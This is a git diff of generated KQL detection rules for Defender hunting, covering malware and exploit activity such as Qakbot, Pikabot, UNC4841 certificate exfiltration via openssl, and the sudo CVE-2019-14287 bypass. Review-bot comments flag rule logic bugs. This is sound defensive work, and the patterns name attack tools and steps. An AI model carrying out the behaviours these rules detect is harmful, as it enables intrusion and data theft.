 | where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or 
ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
index cb3e18a8..dc80e5ad 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/qakbot_rundll32_fake_dll_extension_execution.kql
@@ -1,12 +1,12 @@
-// Title: Qakbot Rundll32 Fake DLL Extension Execution
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-24
-// Level: critical
-// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Qakbot Rundll32 Fake DLL Extension Execution
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
index 40b73934..ac8f2aa7 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
-// Author: TropChaud
-// Date: 2023-01-26
-// Level: medium
-// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
index df9b7bc2..5175147d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql
@@ -1,10 +1,10 @@
-// Title: ScreenConnect - SlashAndGrab Exploitation Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-23
-// Level: high
-// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.emerging-threats
-
-DeviceFileEvents
+// Title: ScreenConnect - SlashAndGrab Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
 | where (FolderPath contains "C:\\Windows\\Temp\\ScreenConnect\\" and FolderPath contains "\\LB3.exe") or (FolderPath contains "C:\\mpyutd.msi" or FolderPath contains "C:\\perflogs\\RunSchedulerTaskOnce.ps1" or FolderPath contains "C:\\ProgramData\\1.msi" or FolderPath contains "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi" or FolderPath contains "C:\\ProgramData\\update.dat" or FolderPath contains "C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelAgentCore.dll" or FolderPath contains "C:\\Windows\\Help\\Help\\SentinelUI.exe" or FolderPath contains "C:\\Windows\\spsrv.exe" or FolderPath contains "C:\\Windows\\Temp\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
index 2483af37..c836847d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql
@@ -1,12 +1,12 @@
-// Title: Small Sieve Malware File Indicator Creation
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2023-05-19
-// Level: high
-// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Small Sieve Malware File Indicator Creation
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where (FolderPath contains "Microsift" and ((FolderPath contains "\\Roaming\\" or FolderPath contains "\\Local\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\"))) or FolderPath endswith "\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
index 6875eeb3..6bf7a8d0 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/sofacy_trojan_loader_activity.kql
@@ -1,10 +1,10 @@
-// Title: Sofacy Trojan Loader Activity
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2018-03-01
-// Level: high
-// Description: Detects Trojan loader activity as used by APT28
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Sofacy Trojan Loader Activity
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-01
+// Level: high
+// Description: Detects Trojan loader activity as used by APT28
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql
index 9e9357af..3d48787e 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/sudo_privilege_escalation_cve_2019_14287.kql
@@ -1,12 +1,12 @@
-// Title: Sudo Privilege Escalation CVE-2019-14287
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-15
-// Level: high
-// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Sudo Privilege Escalation CVE-2019-14287
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-15
+// Level: high
+// Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1068, attack.t1548.003, cve.2019-14287, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -u#"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql
index 0f6551fa..84638fb0 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious RazerInstaller Explorer Subprocess
-// Author: Florian Roth (Nextron Systems), Maxime Thiebaut
-// Date: 2021-08-23
-// Level: high
-// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats
-// False Positives:
-// - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
-
-DeviceProcessEvents
+// Title: Suspicious RazerInstaller Explorer Subprocess
+// Author: Florian Roth (Nextron Systems), Maxime Thiebaut
+// Date: 2021-08-23
+// Level: high
+// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats
+// False Positives:
+// - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+
+DeviceProcessEvents
 | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
index 5624c144..442fa855 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
-// Author: Sittikorn S
-// Date: 2020-05-31
-// Level: medium
-// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats
-
-DeviceRegistryEvents
+// Title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
+// Author: Sittikorn S
+// Date: 2020-05-31
+// Level: medium
+// Description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1221, detection.emerging-threats
+
+DeviceRegistryEvents
 | where RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
index 2ba11c77..29eea50f 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_compressed_files_from_temp_sh_using_wget.kql
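Review bot: The filter `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt*"` on the new side of the MSDT hunk can never match, because `=~` is case-insensitive string equality in KQL and the trailing `*` is compared as a literal character rather than treated as a wildcard. The source rule presumably expressed a prefix match, so the converter should emit `| where RegistryKey startswith "HKEY_LOCAL_MACHINE\\CLASSES\\ms-msdt"` (`startswith` is already case-insensitive). Since this file is generated, the same wildcard-to-literal issue is likely present in other regenerated rules that used a trailing `*`, so the fix belongs in the KQL backend rather than in this file alone.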
@@ -1,10 +1,10 @@
-// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: high
-// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: UNC4841 - Download Compressed Files From Temp.sh Using Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a ".zip" or ".rar" files from "temp.sh". As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "https://temp.sh/" and (ProcessCommandLine endswith ".rar" or ProcessCommandLine endswith ".zip") and FolderPath endswith "/wget"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
index efd5b053..0c885527 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql
@@ -1,10 +1,10 @@
-// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: high
-// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--no-check-certificate" and ProcessCommandLine endswith ".tar" and ProcessCommandLine matches regex "https://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/wget") and (not((ProcessCommandLine contains "https://10." or ProcessCommandLine contains "https://192.168." or ProcessCommandLine contains "https://172.16." or ProcessCommandLine contains "https://172.17." or ProcessCommandLine contains "https://172.18." or ProcessCommandLine contains "https://172.19." or ProcessCommandLine contains "https://172.20." or ProcessCommandLine contains "https://172.21." or ProcessCommandLine contains "https://172.22." or ProcessCommandLine contains "https://172.23." or ProcessCommandLine contains "https://172.24." or ProcessCommandLine contains "https://172.25." or ProcessCommandLine contains "https://172.26." or ProcessCommandLine contains "https://172.27." or ProcessCommandLine contains "https://172.28." 
or ProcessCommandLine contains "https://172.29." or ProcessCommandLine contains "https://172.30." or ProcessCommandLine contains "https://172.31." or ProcessCommandLine contains "https://127." or ProcessCommandLine contains "https://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
index 2e8e2ebb..1b1c2190 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/unc4841_ssl_certificate_exfiltration_via_openssl.kql
@@ -1,10 +1,10 @@
-// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: high
-// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: UNC4841 - SSL Certificate Exfiltration Via Openssl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects the execution of "openssl" to connect to an IP address. This techniques was used by UNC4841 to exfiltrate SSL certificates and as a C2 channel with named pipes. Investigate commands executed in the temporal vicinity of this command.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ":443" or ProcessCommandLine contains ":8080") and (ProcessCommandLine contains "s_client" and ProcessCommandLine contains "-quiet" and ProcessCommandLine contains "-connect") and ProcessCommandLine matches regex "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
index ae88791b..abe5ceb6 100644
--- a/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
+++ b/KQL/rules-emerging-threats/Discovery/potential_pikabot_discovery_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential Pikabot Discovery Activity
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-10-27
-// Level: high
-// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
-// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Pikabot Discovery Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
+// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
index 8f185e95..634c1049 100644
--- a/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
+++ b/KQL/rules-emerging-threats/Execution/adwind_rat_jrat.kql
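Review bot: `InitiatingProcessParentFileName endswith "\\rundll32.exe"` in the Pikabot hunk looks unmatchable: in DeviceProcessEvents that column carries only the grandparent's file name, with no directory separator, so a test that requires a leading backslash should be `InitiatingProcessParentFileName =~ "rundll32.exe"`. This suggests the backend maps the source rule's parent-image field to a name-only column while still emitting path-style `endswith` patterns, so the mapping is worth checking across the regenerated rules rather than fixing here only. The exact-match `in~ ("ipconfig.exe /all", …)` on the full command line is also brittle (a `ipconfig /all` invocation will not match), but that is inherited from the source rule and is noted for awareness rather than as a change request.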
@@ -1,10 +1,10 @@
-// Title: Adwind RAT / JRAT
-// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
-// Date: 2017-11-10
-// Level: high
-// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Adwind RAT / JRAT
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
index 4e802ac4..5a41e6a4 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql
@@ -1,10 +1,10 @@
-// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-06-29
-// Level: critical
-// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats
-
-DeviceFileEvents
+// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-29
+// Level: critical
+// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
index c2d2c1bb..21bdb334 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_26858_exchange_exploitation.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2021-26858 Exchange Exploitation
-// Author: Bhabesh Raj
-// Date: 2021-03-03
-// Level: high
-// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
-// creation of non-standard files on disk by Exchange Server’s Unified Messaging service
-// which could indicate dropping web shells or other malicious content
-// MITRE Tactic: Execution
-// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats
-
-DeviceFileEvents
+// Title: CVE-2021-26858 Exchange Exploitation
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for
+// creation of non-standard files on disk by Exchange Server’s Unified Messaging service
+// which could indicate dropping web shells or other malicious content
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql
index c3adf9a9..3fd6bd5a 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2021-44077 POC Default Dropped File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-06
-// Level: high
-// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2021-44077, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: CVE-2021-44077 POC Default Dropped File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-06
+// Level: high
+// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2021-44077, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
index 43867a5b..997cc9fa 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql
@@ -1,10 +1,10 @@
-// Title: CVE-2022-24527 Microsoft Connected Cache LPE
